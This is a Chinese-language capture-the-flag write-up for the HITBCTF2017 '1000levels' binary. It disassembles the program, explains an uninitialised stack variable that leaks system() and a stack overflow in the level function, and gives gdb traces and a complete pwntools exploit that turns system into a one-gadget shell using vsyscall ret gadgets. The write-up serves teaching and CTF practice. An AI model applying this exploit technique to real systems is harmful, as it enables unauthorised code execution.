# 6.1.16 pwn HITBCTF2017 1000levels - [题目复现](#题目复现) - [题目解析](#题目解析) - [漏洞利用](#漏洞利用) - [参考资料](#参考资料) [下载文件](../src/writeup/6.1.16_pwn_hitbctf2017_1000levels) ## 题目复现 ``` $ file 1000levels 1000levels: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d0381dfa29216ed7d765936155bbaa3f9501283a, not stripped $ checksec -f 1000levels RELRO STACK CANARY NX PIE RPATH RUNPATH FORTIFY Fortified Fortifiable FILE Partial RELRO No canary found NX enabled PIE enabled No RPATH No RUNPATH No 0 6 1000levels $ strings libc-2.23.so | grep "GNU C" GNU C Library (Ubuntu GLIBC 2.23-0ubuntu9) stable release version 2.23, by Roland McGrath et al. Compiled by GNU CC version 5.4.0 20160609. ``` 关闭了 Canary,开启 NX 和 PIE。于是猜测可能是栈溢出,但需要绕过 ASLR。not stripped 可以说是很开心了。 玩一下: ``` $ ./1000levels Welcome to 1000levels, it's much more diffcult than before. 1. Go 2. Hint 3. Give up Choice: 1 How many levels? 0 Coward Any more? 1 Let's go!' ==================================================== Level 1 Question: 0 * 0 = ? Answer:0 Great job! You finished 1 levels in 1 seconds ``` Go 的功能看起来就是让你先输入一个数,然后再输入一个数,两个数相加作为 levels,然后让你做算术。 但是很奇怪的是,如果你使用了 Hint 功能,然后第一个数输入了 0 的时候,无论第二个数是多少,仿佛都会出现无限多的 levels: ``` $ ./1000levels Welcome to 1000levels, it's much more diffcult than before. 1. Go 2. Hint 3. Give up Choice: 2 NO PWN NO FUN 1. Go 2. Hint 3. Give up Choice: 1 How many levels? 0 Coward Any more? 1 More levels than before! Let's go!' ==================================================== Level 1 Question: 0 * 0 = ? Answer:0 ==================================================== Level 2 Question: 1 * 1 = ? Answer:1 ==================================================== Level 3 Question: 1 * 1 = ? Answer:1 ==================================================== Level 4 Question: 3 * 1 = ? Answer: ``` 所以应该重点关注一下 Hint 功能。 ## 题目解析 程序比较简单,基本上只有 Go 和 Hint 两个功能。 #### hint 先来看 hint: ``` [0x000009d0]> pdf @ sym.hint / (fcn) sym.hint 140 | sym.hint (); | ; var int local_110h @ rbp-0x110 | ; CALL XREF from 0x00000fa6 (main) | 0x00000cf0 push rbp | 0x00000cf1 mov rbp, rsp | 0x00000cf4 sub rsp, 0x110 ; 开辟栈空间 rsp - 0x110 | 0x00000cfb mov rax, qword [reloc.system] ; [0x201fd0:8]=0 | 0x00000d02 mov qword [local_110h], rax ; 将 system 地址放到栈顶 [local_110h] | 0x00000d09 lea rax, obj.show_hint ; 0x20208c | 0x00000d10 mov eax, dword [rax] ; 取出 show_hint | 0x00000d12 test eax, eax | ,=< 0x00000d14 je 0xd41 ; 当 show_hint 为 0 时 | | 0x00000d16 mov rax, qword [local_110h] ; 否则继续 | | 0x00000d1d lea rdx, [local_110h] | | 0x00000d24 lea rcx, [rdx + 8] | | 0x00000d28 mov rdx, rax | | 0x00000d2b lea rsi, str.Hint:__p ; 0x111d ; "Hint: %p\n" | | 0x00000d32 mov rdi, rcx | | 0x00000d35 mov eax, 0 | | 0x00000d3a call sym.imp.sprintf ; 将 system 地址复制到 [local_110h+0x8] | ,==< 0x00000d3f jmp 0xd66 | || ; JMP XREF from 0x00000d14 (sym.hint) | |`-> 0x00000d41 lea rax, [local_110h] | | 0x00000d48 add rax, 8 ; 将 "NO PWN NO FUN" 复制到 [local_110h+0x8] | | 0x00000d4c movabs rsi, 0x4e204e5750204f4e | | 0x00000d56 mov qword [rax], rsi | | 0x00000d59 mov dword [rax + 8], 0x5546204f ; [0x5546204f:4]=-1 | | 0x00000d60 mov word [rax + 0xc], 0x4e ; 'N' ; [0x4e:2]=0 | | ; JMP XREF from 0x00000d3f (sym.hint) | `--> 0x00000d66 lea rax, [local_110h] | 0x00000d6d add rax, 8 | 0x00000d71 mov rdi, rax | 0x00000d74 call sym.imp.puts ; 打印出 [local_110h+0x8] | 0x00000d79 nop | 0x00000d7a leave \ 0x00000d7b ret [0x000009d0]> ir~system vaddr=0x00201fd0 paddr=0x00001fd0 type=SET_64 system [0x000009d0]> is~show_hint 051 0x0000208c 0x0020208c GLOBAL OBJECT 4 show_hint ``` 可以看到 `system()` 的地址被复制到栈上(`local_110h`),然后对全局变量 `show_hint` 进行判断,如果为 0,打印字符串 “NO PWN NO FUN”,否则打印 `system()` 的地址。 为了绕过 ASLR,我们需要信息泄漏,如果能够修改 `show_hint`,那我们就可以得到 `system()` 的地址。但是 `show_hint` 放在 `.bss` 段上,程序开启了 PIE,地址随机无法修改。 #### go 继续看 go: ``` [0x000009d0]> pdf @ sym.go / (fcn) sym.go 372 | sym.go (); | ; var int local_120h @ rbp-0x120 | ; var int local_118h @ rbp-0x118 | ; var int local_114h @ rbp-0x114 | ; var int local_110h @ rbp-0x110 | ; var int local_108h @ rbp-0x108 | ; CALL XREF from 0x00000f9f (main) | 0x00000b7c push rbp | 0x00000b7d mov rbp, rsp | 0x00000b80 sub rsp, 0x120 ; 开辟栈空间 rsp - 0x120 | 0x00000b87 lea rdi, str.How_many_levels ; 0x1094 ; "How many levels?" | 0x00000b8e call sym.imp.puts ; int puts(const char *s) | 0x00000b93 call sym.read_num ; ssize_t read(int fildes, void *buf, size_t nbyte) | 0x00000b98 mov qword [local_120h], rax ; 读入第一个数 num1 放到 [local_120h] | 0x00000b9f mov rax, qword [local_120h] | 0x00000ba6 test rax, rax | ,=< 0x00000ba9 jg 0xbb9 ; num1 大于 0 时跳转 | | 0x00000bab lea rdi, str.Coward ; 0x10a5 ; "Coward" | | 0x00000bb2 call sym.imp.puts ; int puts(const char *s) | ,==< 0x00000bb7 jmp 0xbc7 | || ; JMP XREF from 0x00000ba9 (sym.go) | |`-> 0x00000bb9 mov rax, qword [local_120h] | | 0x00000bc0 mov qword [local_110h], rax ; num1 放到 [local_110h] | | ; JMP XREF from 0x00000bb7 (sym.go) | `--> 0x00000bc7 lea rdi, str.Any_more ; 0x10ac ; "Any more?" | 0x00000bce call sym.imp.puts ; int puts(const char *s) | 0x00000bd3 call sym.read_num ; ssize_t read(int fildes, void *buf, size_t nbyte) | 0x00000bd8 mov qword [local_120h], rax ; 读入第二个数 num2 到 [local_120h] | 0x00000bdf mov rdx, qword [local_110h] | 0x00000be6 mov rax, qword [local_120h] | 0x00000bed add rax, rdx ; 两个数的和 num3 = num1 + num2 | 0x00000bf0 mov qword [local_110h], rax | 0x00000bf7 mov rax, qword [local_110h] | 0x00000bfe test rax, rax | ,=< 0x00000c01 jg 0xc14 ; num3 大于 0 时跳转 | | 0x00000c03 lea rdi, str.Coward ; 0x10a5 ; "Coward" | | 0x00000c0a call sym.imp.puts ; int puts(const char *s) | ,==< 0x00000c0f jmp 0xcee | |`-> 0x00000c14 mov rax, qword [local_110h] | | 0x00000c1b cmp rax, 0x3e7 ; num3 与 999 比较 | |,=< 0x00000c21 jle 0xc3c ; num3 小于等于 999 时 | || 0x00000c23 lea rdi, str.More_levels_than_before ; 0x10b6 ; "More levels than before!" | || 0x00000c2a call sym.imp.puts ; int puts(const char *s) | || 0x00000c2f mov qword [local_108h], 0x3e8 ; 将 num3 设为最大值 1000 | ,===< 0x00000c3a jmp 0xc4a | ||| ; JMP XREF from 0x00000c21 (sym.go) | ||`-> 0x00000c3c mov rax, qword [local_110h] | || 0x00000c43 mov qword [local_108h], rax ; 把 num3 放到 [local_108h] | || ; JMP XREF from 0x00000c3a (sym.go) | `---> 0x00000c4a lea rdi, str.Let_s_go ; 0x10cf ; "Let's go!'" | | 0x00000c51 call sym.imp.puts ; int puts(const char *s) | | 0x00000c56 mov edi, 0 | | 0x00000c5b call sym.imp.time ; time_t time(time_t *timer) | | 0x00000c60 mov dword [local_118h], eax | | 0x00000c66 mov rax, qword [local_108h] | | 0x00000c6d mov edi, eax ; rdi = num3 | | 0x00000c6f call sym.level_int ; 进入计算题游戏 | | 0x00000c74 test eax, eax | | 0x00000c76 setne al | | 0x00000c79 test al, al | |,=< 0x00000c7b je 0xcd8 ; 返回值为 0 时跳转,游戏失败 | || 0x00000c7d mov edi, 0 ; 否则游戏成功 | || 0x00000c82 call sym.imp.time ; time_t time(time_t *timer) | || 0x00000c87 mov dword [local_114h], eax | || 0x00000c8d mov edx, dword [local_114h] | || 0x00000c93 mov eax, dword [local_118h] | || 0x00000c99 sub edx, eax | || 0x00000c9b mov rax, qword [local_108h] | || 0x00000ca2 lea rcx, [local_120h] | || 0x00000ca9 lea rdi, [rcx + 0x20] ; "@" | || 0x00000cad mov ecx, edx | || 0x00000caf mov rdx, rax | || 0x00000cb2 lea rsi, str.Great_job__You_finished__d_levels_in__d_seconds ; 0x10e0 ; "Great job! You finished %d levels in %d seconds\n" | || 0x00000cb9 mov eax, 0 | || 0x00000cbe call sym.imp.sprintf ; int sprintf(char *s, | || 0x00000cc3 lea rax, [local_120h] | || 0x00000cca add rax, 0x20 | || 0x00000cce mov rdi, rax | || 0x00000cd1 call sym.imp.puts ; int puts(const char *s) | ,===< 0x00000cd6 jmp 0xce4 | ||| ; JMP XREF from 0x00000c7b (sym.go) | ||`-> 0x00000cd8 lea rdi, str.You_failed. ; 0x1111 ; "You failed." | || 0x00000cdf call sym.imp.puts ; int puts(const char *s) | || ; JMP XREF from 0x00000cd6 (sym.go) | `---> 0x00000ce4 mov edi, 0 | | 0x00000ce9 call sym.imp.exit ; void exit(int status) | | ; JMP XREF from 0x00000c0f (sym.go) | `--> 0x00000cee leave \ 0x00000cef ret ``` 可以看到第一个数 num1 被读到 `local_120h`,如果大于 0,num1 被复制到 `local_110h`,然后读取第二个数 num2 到 `local_120h`,将两个数相加再存到 `local_110h`。但是如果 num1 小于等于 0,程序会直接执行读取 num2 到 `local_120h` 的操作,然后读取 `local_110h` 的数值作为 num1,将两数相加。整个过程都没有对 `local_110h` 进行初始化,程序似乎默认了 `local_110h` 的值是 0,然而事实并非如此。回想一下 hint 操作,放置 system 的地址正是 `local_110h`(两个函数的rbp相同)。这是一个内存未初始化造成的漏洞。 接下来,根据两数相加的和,程序有三条路径,如果和小于 0,程序返回到开始菜单;如果和大于 0 且小于 1000,进入游戏;如果和大于 1000,则将其设置为最大值 1000,进入游戏。 然后来看游戏函数 `sym.level_int()`: ``` [0x000009d0]> pdf @ sym.level_int / (fcn) sym.level_int 289 | sym.level_int (); | ; var int local_34h @ rbp-0x34 | ; var int local_30h @ rbp-0x30 | ; var int local_28h @ rbp-0x28 | ; var int local_20h @ rbp-0x20 | ; var int local_18h @ rbp-0x18 | ; var int local_10h @ rbp-0x10 | ; var int local_ch @ rbp-0xc | ; var int local_8h @ rbp-0x8 | ; var int local_4h @ rbp-0x4 | ; CALL XREF from 0x00000c6f (sym.go) | ; CALL XREF from 0x00000e70 (sym.level_int) | 0x00000e2d push rbp | 0x00000e2e mov rbp, rsp | 0x00000e31 sub rsp, 0x40 ; '@' | 0x00000e35 mov dword [local_34h], edi ; 将 level 存到 [local_34h] | 0x00000e38 mov qword [local_30h], 0 | 0x00000e40 mov qword [local_28h], 0 | 0x00000e48 mov qword [local_20h], 0 | 0x00000e50 mov qword [local_18h], 0 | 0x00000e58 cmp dword [local_34h], 0 | ,=< 0x00000e5c jne 0xe68 ; level 不等于 0 时继续 | | 0x00000e5e mov eax, 1 | ,==< 0x00000e63 jmp 0xf4c ; 否则函数返回 1 | || ; JMP XREF from 0x00000e5c (sym.level_int) | |`-> 0x00000e68 mov eax, dword [local_34h] | | 0x00000e6b sub eax, 1 ; level = level - 1 | | 0x00000e6e mov edi, eax | | 0x00000e70 call sym.level_int ; 递归调用游戏函数 | | 0x00000e75 test eax, eax | | 0x00000e77 sete al | | 0x00000e7a test al, al | |,=< 0x00000e7c je 0xe88 ; 返回值为 1 时继续 | || 0x00000e7e mov eax, 0 | ,===< 0x00000e83 jmp 0xf4c ; 否则函数结束返回 0 | ||| ; JMP XREF from 0x00000e7c (sym.level_int) | ||`-> 0x00000e88 call sym.imp.rand ; int rand(void) | || 0x00000e8d cdq | || 0x00000e8e idiv dword [local_34h] | || 0x00000e91 mov dword [local_8h], edx | || 0x00000e94 call sym.imp.rand ; int rand(void) | || 0x00000e99 cdq | || 0x00000e9a idiv dword [local_34h] | || 0x00000e9d mov dword [local_ch], edx | || 0x00000ea0 mov eax, dword [local_8h] | || 0x00000ea3 imul eax, dword [local_ch] | || 0x00000ea7 mov dword [local_10h], eax ; 将正确答案放到 [local_10h] | || 0x00000eaa lea rdi, str. ; 0x1160 ; "====================================================" | || 0x00000eb1 call sym.imp.puts ; int puts(const char *s) | || 0x00000eb6 mov eax, dword [local_34h] | || 0x00000eb9 mov esi, eax | || 0x00000ebb lea rdi, str.Level__d ; 0x1195 ; "Level %d\n" | || 0x00000ec2 mov eax, 0 | || 0x00000ec7 call sym.imp.printf ; int printf(const char *format) | || 0x00000ecc mov edx, dword [local_ch] | || 0x00000ecf mov eax, dword [local_8h] | || 0x00000ed2 mov esi, eax | || 0x00000ed4 lea rdi, str.Question:__d____d_____Answer: ; 0x119f ; "Question: %d * %d = ? Answer:" | || 0x00000edb mov eax, 0 | || 0x00000ee0 call sym.imp.printf ; int printf(const char *format) | || 0x00000ee5 lea rax, [local_30h] ; 读取输入到 [local_30h] | || 0x00000ee9 mov edx, 0x400 | || 0x00000eee mov rsi, rax | || 0x00000ef1 mov edi, 0 | || 0x00000ef6 call sym.imp.read ; read(0, local_30h, 0x400) | || 0x00000efb mov dword [local_4h], eax ; 返回值放到 [local_4h],即读取字节数 | || ; JMP XREF from 0x00000f16 (sym.level_int) | ||.-> 0x00000efe mov eax, dword [local_4h] | ||: 0x00000f01 and eax, 7 ; 取出低 3 位 | ||: 0x00000f04 test eax, eax | ,====< 0x00000f06 je 0xf18 ; 为 0 时跳转,即 8 的倍数 | |||: 0x00000f08 mov eax, dword [local_4h] | |||: 0x00000f0b cdqe | |||: 0x00000f0d mov byte [rbp + rax - 0x30], 0 ; 在字符串末尾加上 0 | |||: 0x00000f12 add dword [local_4h], 1 | |||`=< 0x00000f16 jmp 0xefe ; 循环 | ||| ; JMP XREF from 0x00000f06 (sym.level_int) | `----> 0x00000f18 lea rax, [local_30h] | || 0x00000f1c mov edx, 0xa | || 0x00000f21 mov esi, 0 | || 0x00000f26 mov rdi, rax | || 0x00000f29 call sym.imp.strtol ; long strtol(const char *str, char**endptr, int base) | || 0x00000f2e mov rdx, rax | || 0x00000f31 mov eax, dword [local_10h] | || 0x00000f34 cdqe | || 0x00000f36 cmp rdx, rax ; 将输入答案与正确答案相比较 | || 0x00000f39 sete al ; 相等时设置 al 为 1 | || 0x00000f3c test al, al | ||,=< 0x00000f3e je 0xf47 ; 返回值为 0 | ||| 0x00000f40 mov eax, 1 | ,====< 0x00000f45 jmp 0xf4c ; 返回值为 1 | |||| ; JMP XREF from 0x00000f3e (sym.level_int) | |||`-> 0x00000f47 mov eax, 0 | ||| ; JMP XREF from 0x00000f45 (sym.level_int) | ||| ; JMP XREF from 0x00000e83 (sym.level_int) | ||| ; JMP XREF from 0x00000e63 (sym.level_int) | ```--> 0x00000f4c leave \ 0x00000f4d ret ``` 可以看到 `read()` 函数有一个很明显的栈溢出漏洞,`local_30h` 并没有 `0x400` 这么大的空间。由于游戏是递归的,所以我们需要答对前 999 道题,在最后一题时溢出,构造 ROP。 ## 漏洞利用 总结一下,程序存在两个漏洞: - hint 函数将 system 放到栈上,而 go 函数在使用该地址时未进行初始化 - level 函数存在栈溢出 关于利用的问题也有两个: - 虽然 system 被放到了栈上,但我们不能设置其参数 - 程序开启了 PIE,但没有可以进行信息泄漏的漏洞 对于第一个问题,我们有不需要参数的 one-gadget 可以用,通过将输入的第二个数设置为偏移,即可通过程序的计算将 system 修改为 one-gadget。 ``` $ one_gadget libc-2.23.so 0x45216 execve("/bin/sh", rsp+0x30, environ) constraints: rax == NULL 0x4526a execve("/bin/sh", rsp+0x30, environ) constraints: [rsp+0x30] == NULL 0xf0274 execve("/bin/sh", rsp+0x50, environ) constraints: [rsp+0x50] == NULL 0xf1117 execve("/bin/sh", rsp+0x70, environ) constraints: [rsp+0x70] == NULL ``` 这里我们选择 `0x4526a` 地址上的 one-gadget。 第二个问题,在随机化的情况下怎么找到可用的 `ret` gadget?这时候可以利用 vsyscall,这是一个固定的地址。(参考章节4.15) ``` gdb-peda$ vmmap vsyscall Start End Perm Name 0xffffffffff600000 0xffffffffff601000 r-xp [vsyscall] gdb-peda$ x/5i 0xffffffffff600000 0xffffffffff600000: mov rax,0x60 0xffffffffff600007: syscall 0xffffffffff600009: ret 0xffffffffff60000a: int3 0xffffffffff60000b: int3 ``` 但我们必须跳到 vsyscall 的开头,而不能直接跳到 ret,这是内核决定的。 最后一次的 payload 和调试结果如下: ``` gdb-peda$ x/11gx 0x7fffffffec10-0x50 0x7fffffffebc0: 0x4141414141414141 0x4141414141414141 <-- rbp -0x30 0x7fffffffebd0: 0x4141414141414141 0x4141414141414141 0x7fffffffebe0: 0x4141414141414141 0x4141414141414141 0x7fffffffebf0: 0x4242424242424242 0xffffffffff600000 <-- rbp <-- ret 0x7fffffffec00: 0xffffffffff600000 0xffffffffff600000 <-- ret <-- ret 0x7fffffffec10: 0x00007ffff7a5226a <-- one-gadget ``` ``` gdb-peda$ ni [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x0 RCX: 0xa ('\n') RDX: 0x0 RSI: 0x0 RDI: 0x7fffffffebc0 ('A' , "P") RBP: 0x4242424242424242 ('BBBBBBBB') RSP: 0x7fffffffebf8 --> 0xffffffffff600000 (mov rax,0x60) RIP: 0x555555554f4d (<_Z5leveli+288>: ret) R8 : 0x0 R9 : 0x1999999999999999 R10: 0x0 R11: 0x7ffff7b845a0 --> 0x2000200020002 R12: 0x5555555549d0 (<_start>: xor ebp,ebp) R13: 0x7fffffffee40 --> 0x1 R14: 0x0 R15: 0x0 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x555555554f45 <_Z5leveli+280>: jmp 0x555555554f4c <_Z5leveli+287> 0x555555554f47 <_Z5leveli+282>: mov eax,0x0 0x555555554f4c <_Z5leveli+287>: leave => 0x555555554f4d <_Z5leveli+288>: ret 0x555555554f4e
: push rbp 0x555555554f4f : mov rbp,rsp 0x555555554f52 : sub rsp,0x30 0x555555554f56 : mov QWORD PTR [rbp-0x30],0x0 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffebf8 --> 0xffffffffff600000 (mov rax,0x60) 0008| 0x7fffffffec00 --> 0xffffffffff600000 (mov rax,0x60) 0016| 0x7fffffffec08 --> 0xffffffffff600000 (mov rax,0x60) 0024| 0x7fffffffec10 --> 0x7ffff7a5226a (mov rax,QWORD PTR [rip+0x37ec47] # 0x7ffff7dd0eb8) 0032| 0x7fffffffec18 --> 0x3e8 0040| 0x7fffffffec20 --> 0x4e5546204f ('O FUN') 0048| 0x7fffffffec28 --> 0xff0000 0056| 0x7fffffffec30 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value 0x0000555555554f4d in level(int) () ``` 三次 return 之后,就会跳到 one-gadget 上去。 Bingo!!! ``` $ python exp.py [+] Starting local process './1000levels': pid 6901 [*] Switching to interactive mode $ whoami firmy ``` #### exploit 完整的 exp 如下: ```python #!/usr/bin/env python from pwn import * #context.log_level = 'debug' io = process(['./1000levels'], env={'LD_PRELOAD':'./libc-2.23.so'}) one_gadget = 0x4526a system_offset = 0x45390 ret_addr = 0xffffffffff600000 def go(levels, more): io.sendlineafter("Choice:\n", '1') io.sendlineafter("levels?\n", str(levels)) io.sendlineafter("more?\n", str(more)) def hint(): io.sendlineafter("Choice:\n", '2') if __name__ == "__main__": hint() go(0, one_gadget - system_offset) for i in range(999): io.recvuntil("Question: ") a = int(io.recvuntil(" ")[:-1]) io.recvuntil("* ") b = int(io.recvuntil(" ")[:-1]) io.sendlineafter("Answer:", str(a * b)) payload = 'A' * 0x30 # buffer payload += 'B' * 0x8 # rbp payload += p64(ret_addr) * 3 io.sendafter("Answer:", payload) io.interactive() ``` ## 参考资料 - https://ctftime.org/task/4539